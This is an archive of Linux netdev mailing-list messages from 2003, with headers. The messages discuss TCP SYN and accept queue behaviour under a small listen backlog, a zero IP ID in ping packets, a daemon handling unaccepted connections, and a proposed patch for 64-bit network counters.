charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3789 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev > Linux (2.4.18) places incoming connection requests into the syn_recd state > when the server's backlog queue is full. I thought they were supposed to be > discarded if the server's backlog is full, forcing the client to > subsequently retransmit the request after it times out. Why does linux put > the server side into the syn_recd state when its backlog is full? Do you have tcp_syncookies on? And are you exceeding the len as configured by tcp_max_syn_backlog? thanks, Nivedita [Please cc or post to netdev, like most networking folk, dont subscribe to lkml] From palbrecht@qwest.net Sun Jul 6 15:15:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 15:15:53 -0700 (PDT) Received: from mpls-qmqp-02.inet.qwest.net (mpls-qmqp-02.inet.qwest.net [63.231.195.113]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h66MFb2x022394 for ; Sun, 6 Jul 2003 15:15:38 -0700 Received: (qmail 14687 invoked by uid 0); 6 Jul 2003 21:43:05 -0000 Received: from mpls-pop-14.inet.qwest.net (63.231.195.14) by mpls-qmqp-02.inet.qwest.net with QMQP; 6 Jul 2003 21:43:05 -0000 Received: from 0-1pool148-107.nas7.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.148.107) by mpls-pop-14.inet.qwest.net with SMTP; 6 Jul 2003 22:15:36 -0000 Date: Sun, 6 Jul 2003 17:12:19 -0700 Message-ID: <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Nivedita Singhvi" Cc: linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By 
Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3790 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev Nivedita writes: > > Do you have tcp_syncookies on? > syncookies = 0. > >And are you exceeding the len as configured by tcp_max_syn_backlog? > max_syn_backlog = 256. My server program sets its backlog to one and pauses ninety seconds before accepting connections. Within that ninety second interval, I start three client programs that do an active open to my server. I expect one of connections to get discarded when the server's connection backlog limit is exceeded. From niv@us.ibm.com Sun Jul 6 17:03:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 17:03:40 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6702L2x023217 for ; Sun, 6 Jul 2003 17:03:02 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.195.10]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6702Gxe248456; Sun, 6 Jul 2003 20:02:16 -0400 Received: from us.ibm.com (d03av03.boulder.ibm.com [9.17.193.83]) by westrelay01.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6702Ecu144700; Sun, 6 Jul 2003 18:02:15 -0600 Message-ID: <3F08B7E2.7040208@us.ibm.com> Date: Sun, 06 Jul 2003 16:59:30 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Paul Albrecht CC: linux-kernel@vger.kernel.org, netdev Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> In-Reply-To: <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3791 X-ecartis-version: Ecartis 
v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev

Paul Albrecht wrote:
> My server program sets its backlog to one and pauses ninety seconds before
> accepting connections. Within that ninety second interval, I start three
> client programs that do an active open to my server. I expect one of
> connections to get discarded when the server's connection backlog limit is
> exceeded.

We actually have two queues: the syn queue and the socket accept queue. We move the connection request from the syn queue to the accept queue of the socket once the 3 way handshake is complete, i.e. once the state is ESTABLISHED. If the syn queue is full, requests will get dropped and the socket will not change state.

When you set the backlog to 1 in the listen call, what is being capped is the accept queue. So I would expect your server to allow only one of those requests in the accept queue, and the kernel will drop the other two requests.

Actually, details, but we also apply some other conditions before we actually drop the connection request - we try not to be so harsh if the syn queue is still fairly empty.. Think that's so, at any rate :).
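For anyone who wants to repeat the experiment discussed in this thread, the server side might look roughly like the sketch below. It is not Paul's actual program: `open_listener` is a hypothetical helper name, and binding to 127.0.0.1 on an ephemeral port is an assumption made only to keep the example self-contained. The helper just creates the listening socket with the requested backlog; how many handshakes complete before accept() is called is up to the kernel.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Hypothetical helper: create a TCP listener on 127.0.0.1 with the
 * given listen() backlog. The kernel picks the port, which is stored
 * in *port. Returns the socket fd, or -1 on error.
 */
static int open_listener(int backlog, unsigned short *port)
{
    struct sockaddr_in addr;
    socklen_t len = sizeof(addr);
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    if (fd < 0)
        return -1;

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;  /* let the kernel choose a free port */

    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        listen(fd, backlog) < 0 ||
        getsockname(fd, (struct sockaddr *)&addr, &len) < 0) {
        close(fd);
        return -1;
    }

    *port = ntohs(addr.sin_port);
    return fd;
}
```

To mirror the test described above, one would call `open_listener(1, &port)`, sleep for ninety seconds before the first accept(), start three clients against the port in the meantime, and watch the connection states with tcpdump and netstat.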
Nivedita

From palbrecht@qwest.net Sun Jul 6 21:24:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 21:24:13 -0700 (PDT) Received: from mpls-qmqp-03.inet.qwest.net (mpls-qmqp-03.inet.qwest.net [63.231.195.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h674O02x031556 for ; Sun, 6 Jul 2003 21:24:00 -0700 Received: (qmail 25532 invoked by uid 0); 7 Jul 2003 04:16:44 -0000 Received: from mpls-pop-11.inet.qwest.net (63.231.195.11) by mpls-qmqp-03.inet.qwest.net with QMQP; 7 Jul 2003 04:16:44 -0000 Received: from 0-1pool150-126.nas8.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.150.126) by mpls-pop-11.inet.qwest.net with SMTP; 7 Jul 2003 04:23:59 -0000 Date: Sun, 6 Jul 2003 23:20:42 -0700 Message-ID: <000d01c3444f$e6439600$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Nivedita Singhvi" Cc: linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> <3F08B7E2.7040208@us.ibm.com> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3792 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev

Nivedita Singhvi writes:
>
> When you set the backlog to 1 in the listen call, what is
> being capped is the accept queue. So I would expect your
> server to allow only one of those requests in the accept
> queue, and the kernel will drop the other two requests.
>

What you get when you set backlog to one is operating system dependent. Tracing the flows with tcpdump, I get two clean handshakes, so presumably, for linux, one means two. The third connection request *isn't* dropped; according to netstat, it's placed in the syn_recd state. I thought berkeley-derived implementations followed the rule that if there is no room on the backlog queue for the new connection, tcp ignored the received syn.

>
> Actually, details, but we also apply some other conditions
> before we actually drop the connection request - we try not to be
> so harsh if the syn queue is still fairly empty..
>

Irrespective of whatever conditions linux applies, how can the connection enter the syn_recd state if the backlog limit would be exceeded? What's the client supposed to do with the syn/ack from the server? What's the server supposed to do with the ack it gets back from the client?

From niv@us.ibm.com Sun Jul 6 22:54:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 22:55:25 -0700 (PDT) Received: from e32.co.us.ibm.com (e32.co.us.ibm.com [32.97.110.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h675s22x002118 for ; Sun, 6 Jul 2003 22:54:49 -0700 Received: from westrelay05.boulder.ibm.com (westrelay05.boulder.ibm.com [9.17.193.33]) by e32.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h675rv8w189942; Mon, 7 Jul 2003 01:53:57 -0400 Received: from us.ibm.com (d03av03.boulder.ibm.com [9.17.193.83]) by westrelay05.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h675rtTl079362; Sun, 6 Jul 2003 23:53:56 -0600 Message-ID: <3F090A4F.10004@us.ibm.com> Date: Sun, 06 Jul 2003 22:51:11 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Paul Albrecht CC: linux-kernel@vger.kernel.org, netdev Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> <3F08B7E2.7040208@us.ibm.com> <000d01c3444f$e6439600$6801a8c0@oemcomputer> In-Reply-To: <000d01c3444f$e6439600$6801a8c0@oemcomputer> Content-Type: text/plain;
charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3793 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev

Paul Albrecht wrote:
>>When you set the backlog to 1 in the listen call, what is
>>being capped is the accept queue. So I would expect your
>>server to allow only one of those requests in the accept
>>queue, and the kernel will drop the other two requests.
> What you get when you set backlog to one is operating system dependent.

You asked about Linux 2.4.18, and I was speaking strictly for it. This is after all linux-netdev :).

> Tracing the flows with tcpdump, I get two clean handshakes so presumably,
> for linux, one means two. The third connection request *isn't* dropped;

Again, you're limiting the number of connection requests that are allowed to wait in the *accept* queue, which is where we move them once we're ESTABLISHED. You aren't limiting a request sitting in the SYN queue.

> according to netstat, it's placed in the syn_recd state. I thought
> berkeley-derived implementations followed the rule that if there is no room
> on the backlog queue for the new connection, tcp ignored the received
> syn.
>>Actually, details, but we also apply some other conditions
>>before we actually drop the connection request - we try not to be
>>so harsh if the syn queue is still fairly empty..
>>
>
>
> Irrespective of whatever conditions linux applies, how can the connection
> enter the syn_recd state if the backlog limit would be exceeded? What's the
> client supposed to do with the syn/ack from the server? What's the server
> supposed to do with the ack it gets back from the client?

Er, complete the 3 way handshake? If the client gets the syn/ack, it should send a SYN in response, and move to ESTABLISHED state. If the server gets an ack back from the client, we process the ack.
Our processing involves moving the request from the syn queue to the accept queue. Should the accept queue be full (which could occur anytime - eg it could have occurred *after* the server recvd this SYN) we would drop the request. Should the client then send data, it would get a RST, letting it know our side (srvr) has had to throw the connection away. Its quite possible that the accept queue clears and a request can be moved from the SYN queue to the accept queue in the interval of the handshake being completed (?) If we get a SYN, it doesn't seem unreasonable that we enter SYN_RCVD state :). thanks, Nivedita From niv@us.ibm.com Sun Jul 6 23:02:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 23:02:25 -0700 (PDT) Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6761w2x002503 for ; Sun, 6 Jul 2003 23:02:21 -0700 Received: from westrelay05.boulder.ibm.com (westrelay05.boulder.ibm.com [9.17.193.33]) by e34.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6761pDG208178; Mon, 7 Jul 2003 02:01:51 -0400 Received: from us.ibm.com (d03av03.boulder.ibm.com [9.17.193.83]) by westrelay05.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6761nTl054060; Mon, 7 Jul 2003 00:01:49 -0600 Message-ID: <3F090C28.4080405@us.ibm.com> Date: Sun, 06 Jul 2003 22:59:04 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Nivedita Singhvi CC: Paul Albrecht , linux-kernel@vger.kernel.org, netdev Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> <3F08B7E2.7040208@us.ibm.com> <000d01c3444f$e6439600$6801a8c0@oemcomputer> <3F090A4F.10004@us.ibm.com> In-Reply-To: <3F090A4F.10004@us.ibm.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3794 
X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Nivedita Singhvi wrote: > Er, complete the 3 way handshake? If the client gets the syn/ack, it > should send a SYN in response, and move to ESTABLISHED state. If the ~~~ my bad, sorry, that should be ACK, of course... thanks, Nivedita
From kohei@cysols.com Mon Jul 7 04:37:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 04:37:28 -0700 (PDT) Received: from geto.cysol.co.jp (geto.cysol.co.jp [210.233.3.227]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67BbN2x024433 for ; Mon, 7 Jul 2003 04:37:24 -0700 Received: from cysols.com (agari2.priv.cysol.co.jp [192.168.0.249]) by geto.cysol.co.jp (8.12.9/3.7W) with ESMTP id h67BbKwQ007480 for ; Mon, 7 Jul 2003 20:37:21 +0900 (JST) Message-ID: <3F095B7B.5090203@cysols.com> Date: Mon, 07 Jul 2003 20:37:31 +0900 From: Kohei OHTA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: ja MIME-Version: 1.0 To: netdev@oss.sgi.com Subject: IP-ID field of ICMP echo request X-Enigmail-Version: 0.76.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3796 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kohei@cysols.com Precedence: bulk X-list: netdev Hi folks, I found a strange packet, which is generated by ping of Linux. It is observed ID field of IP header in ping packet (Echo request) is always 0. I confirmed this on kernel 2.4.18 and 2.4.21. My colleague also confirmed this is fixed in kernel 2.5.74. I hope this is fixed in next next 2.4.x release. I am sorry if this had been fixed already. #I am not member of this ML.
#If you need any further information, please CC me. Regards, Kohei. From solt@dns.toxicfilms.tv Mon Jul 7 05:29:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 05:29:46 -0700 (PDT) Received: from dns.toxicfilms.tv (postfix@dns.toxicfilms.tv [150.254.37.24]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67CTW2x026104 for ; Mon, 7 Jul 2003 05:29:35 -0700 Received: by dns.toxicfilms.tv (Postfix, from userid 1000) id 60602309B3F; Mon, 7 Jul 2003 14:29:28 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by dns.toxicfilms.tv (Postfix) with ESMTP id 5F9A2187055E; Mon, 7 Jul 2003 14:29:28 +0200 (CEST) Date: Mon, 7 Jul 2003 14:29:28 +0200 (CEST) From: Maciej Soltysiak To: Kohei OHTA Cc: netdev@oss.sgi.com Subject: Re: IP-ID field of ICMP echo request In-Reply-To: <3F095B7B.5090203@cysols.com> Message-ID: References: <3F095B7B.5090203@cysols.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3797 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: solt@dns.toxicfilms.tv Precedence: bulk X-list: netdev > I found a strange packet, which is generated by ping of Linux. > It is observed ID field of IP header in ping packet (Echo request) is always 0. > > I confirmed this on kernel 2.4.18 and 2.4.21. > My colleague also confirmed this is fixed in kernel 2.5.74. > > I hope this is fixed in next next 2.4.x release. RFC 792 says: ... Identifier If code = 0, an identifier to aid in matching echos and replies, may be zero. ... I guess it is okay to have 0 as IPID. 
Regards, Maciej From yoshfuji@linux-ipv6.org Mon Jul 7 05:38:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 05:38:40 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67CcR2x026542 for ; Mon, 7 Jul 2003 05:38:29 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h67CdVBo006132; Mon, 7 Jul 2003 21:39:31 +0900 Date: Mon, 07 Jul 2003 21:39:30 +0900 (JST) Message-Id: <20030707.213930.07095787.yoshfuji@linux-ipv6.org> To: solt@dns.toxicfilms.tv Cc: kohei@cysols.com, netdev@oss.sgi.com Subject: Re: IP-ID field of ICMP echo request From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <3F095B7B.5090203@cysols.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3798 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Mon, 7 Jul 2003 14:29:28 +0200 (CEST)), Maciej Soltysiak says: > > I found a strange packet, which is generated by ping of Linux. > > It is observed ID field of IP header in ping packet (Echo request) is always 0. > > > > I confirmed this on kernel 2.4.18 and 2.4.21. > > My colleague also confirmed this is fixed in kernel 2.5.74. > > > > I hope this is fixed in next next 2.4.x release. > RFC 792 says: > ... 
> Identifier > > If code = 0, an identifier to aid in matching echos and replies, > may be zero. > ... > > I guess it is okay to have 0 as IPID. No, he is not talking about ICMP Identifier (RFC792 Page 14), but IP Identification (RFC791 Page 29). --yoshfuji From solt@dns.toxicfilms.tv Mon Jul 7 05:48:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 05:48:55 -0700 (PDT) Received: from dns.toxicfilms.tv (postfix@dns.toxicfilms.tv [150.254.37.24]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Cmh2x026907 for ; Mon, 7 Jul 2003 05:48:44 -0700 Received: by dns.toxicfilms.tv (Postfix, from userid 1000) id DB64A309B3F; Mon, 7 Jul 2003 14:48:41 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by dns.toxicfilms.tv (Postfix) with ESMTP id DAA0A187055E; Mon, 7 Jul 2003 14:48:41 +0200 (CEST) Date: Mon, 7 Jul 2003 14:48:41 +0200 (CEST) From: Maciej Soltysiak To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= Cc: kohei@cysols.com, netdev@oss.sgi.com Subject: Re: IP-ID field of ICMP echo request In-Reply-To: <20030707.213930.07095787.yoshfuji@linux-ipv6.org> Message-ID: References: <3F095B7B.5090203@cysols.com> <20030707.213930.07095787.yoshfuji@linux-ipv6.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3799 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: solt@dns.toxicfilms.tv Precedence: bulk X-list: netdev > No, he is not talking about ICMP Identifier (RFC792 Page 14), > but IP Identification (RFC791 Page 29). Aah, yes, I misread. Sorry. Anyway I tested it on 2.4.2 and 2.4.18, 2.5.74 and 2.4.21, they set IP ID to 0. At first I thought it was that issue with early 2.4, but it seems it has been there for a while. 
> --yoshfuji Maciej From yoshfuji@linux-ipv6.org Mon Jul 7 06:10:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 06:10:12 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67DA32x027424 for ; Mon, 7 Jul 2003 06:10:04 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h67DBJBo006382; Mon, 7 Jul 2003 22:11:19 +0900 Date: Mon, 07 Jul 2003 22:11:19 +0900 (JST) Message-Id: <20030707.221119.105548240.yoshfuji@linux-ipv6.org> To: kohei@cysols.com CC: netdev@oss.sgi.com, solt@dns.toxicfilms.tv Subject: Re: IP-ID field of ICMP echo request From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030707.213930.07095787.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3800 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Mon, 7 Jul 2003 14:48:41 +0200 (CEST)), Maciej Soltysiak says: > > No, he is not talking about ICMP Identifier (RFC792 Page 14), > > but IP Identification (RFC791 Page 29). > Aah, yes, I misread. Sorry. > > Anyway I tested it on 2.4.2 and 2.4.18, 2.5.74 and 2.4.21, they set IP ID > to 0. At first I thought it was that issue with early 2.4, but it seems it > has been there for a while. 
It seems linux-2.2.22 behaves similarly. Well..., I remember the DF bit. Kohei, add "-M dont" option (do not set DF flag) and we can see non-zero IPID, can't we? -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From linux_4ever@yahoo.com Mon Jul 7 07:03:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 07:03:47 -0700 (PDT) Received: from web9602.mail.yahoo.com (web9602.mail.yahoo.com [216.136.129.181]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67E3h2x028642 for ; Mon, 7 Jul 2003 07:03:44 -0700 Message-ID: <20030707140343.14852.qmail@web9602.mail.yahoo.com> Received: from [207.69.99.207] by web9602.mail.yahoo.com via HTTP; Mon, 07 Jul 2003 07:03:43 PDT Date: Mon, 7 Jul 2003 07:03:43 -0700 (PDT) From: Steve G Subject: Unaccepted Connections To: netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3801 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: linux_4ever@yahoo.com Precedence: bulk X-list: netdev Hello, I have a user space programming question and need some ideas from networking gurus. I am working on a well known inet daemon that listens for tcp connections and passes the descriptor returned by listen() to a child program to handle in the tcp/wait mode. It turns out that many child programs error during their startup and exit without accepting the connection (linuxconf is one of them). The daemon that listens sees the descriptor as readable and starts a new child...which dies. This can loop forever. The questions are: 1) How can a parent process reliably determine that its child has indeed accepted the connection? (ptrace is not a good solution.) 2) Is it possible to tell anything about a connection that has returned from listen but not yet accepted? For instance the source IP address? Or checksum? Can recvfrom PEEK into the packet? 
Thanks,
Steve Grubb

From kaber@trash.net Mon Jul 7 07:05:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 07:06:02 -0700 (PDT) Received: from gw.localnet (port-212-202-52-167.reverse.qsc.de [212.202.52.167]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67E5q2x029014 for ; Mon, 7 Jul 2003 07:05:53 -0700 Received: from ws.localnet ([192.168.0.23] helo=trash.net) by gw.localnet with esmtp (Exim 3.36 #1 (Debian)) id 19ZWbe-0002RM-00; Mon, 07 Jul 2003 16:04:38 +0200 Message-ID: <3F097E4D.1080707@trash.net> Date: Mon, 07 Jul 2003 16:06:05 +0200 From: Patrick McHardy User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3.1) Gecko/20030618 Debian/1.3.1-3 X-Accept-Language: en MIME-Version: 1.0 To: Linux Kernel Mailing List CC: netdev@oss.sgi.com Subject: RFC: another approach for 64-bit network stats Content-Type: multipart/mixed; boundary="------------050706090100050808080106" X-archive-position: 3802 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kaber@trash.net Precedence: bulk X-list: netdev

This is a multi-part message in MIME format.
--------------050706090100050808080106
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

This patch implements a lockless approach for 64-bit network statistics
with only a very rare race condition. On 64-bit systems, nothing is
changed. On 32-bit systems the (32-bit) counter is checked periodically
for overflows. The overflows are saved in counter_high. To detect
overflows, we need to save the counter value when last checked
(counter_last), so there is a 4-byte overhead per 64-bit counter.
The 32-bit values can be accessed as before through stats->counter;
the 64-bit values are accessed through a macro NETSTAT64(stats, counter).
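The carry scheme described above can be tried outside the kernel. What follows is a minimal user-space sketch, not the patch itself: it assumes fixed-width uint32_t fields in place of the kernel's unsigned long, and the names struct stat64, stat64_sync, stat64_read and stat64_demo are hypothetical. It shows how a wrap of the 32-bit counter is detected by comparing against the value saved at the last sync, and how a read adds a temporary carry until the next sync records the wrap.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical user-space model of one statistics counter on a
 * 32-bit system; field names follow the description in the mail. */
struct stat64 {
	uint32_t counter;      /* fast-path 32-bit counter, wraps silently */
	uint32_t counter_high; /* number of wraps recorded by the sync */
	uint32_t counter_last; /* counter value seen at the last sync */
};

/* Periodic sync: a value below the last snapshot means the counter
 * wrapped once since then (assumes at most one wrap per interval). */
static void stat64_sync(struct stat64 *s)
{
	uint32_t cnt = s->counter;

	if (s->counter_last > cnt)
		s->counter_high++;
	s->counter_last = cnt;
}

/* Read: add a carry if the counter wrapped since the last sync. */
static uint64_t stat64_read(const struct stat64 *s)
{
	uint32_t cnt = s->counter;
	uint32_t carry = s->counter_last > cnt;

	return ((uint64_t)(s->counter_high + carry) << 32) | cnt;
}

/* Usage: simulate a wrap between two syncs. */
static uint64_t stat64_demo(void)
{
	struct stat64 s = { 0xFFFFFFF0u, 0, 0 };
	uint64_t before;

	stat64_sync(&s);          /* snapshot just below the wrap point */
	s.counter += 0x20;        /* 32-bit counter wraps to 0x10 */
	before = stat64_read(&s); /* carry is applied on the read side */
	stat64_sync(&s);          /* wrap is now recorded in counter_high */
	assert(stat64_read(&s) == before);
	return before;
}
```

In this single-threaded model the read before and after the sync agree. The race mentioned in the mail only appears when a sync runs concurrently with a read, which this sketch does not attempt to reproduce.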
Accessing the 64-bit values is subject to the race condition mentioned
above: if the counters are synced while they are being read and an
overflow occurred, the value could be off by 4 GB. However, the next
read will return the correct value, and at gigabit speed we only need
to sync every ~30s, so that's much better than racing on every counter
update (using 64-bit counters directly) and potentially damaging the
counter permanently. The race could be avoided by locking syncs and
reads (not normal counter updates).

The patch only breaks binary interfaces: all in-kernel users can
continue to use the 32-bit values until they have been changed,
userspace software just needs recompilation, and device drivers don't
need any changes at all.

Comments ?

Bye,
Patrick

--------------050706090100050808080106
Content-Type: text/plain;
 name="netstats64.diff"
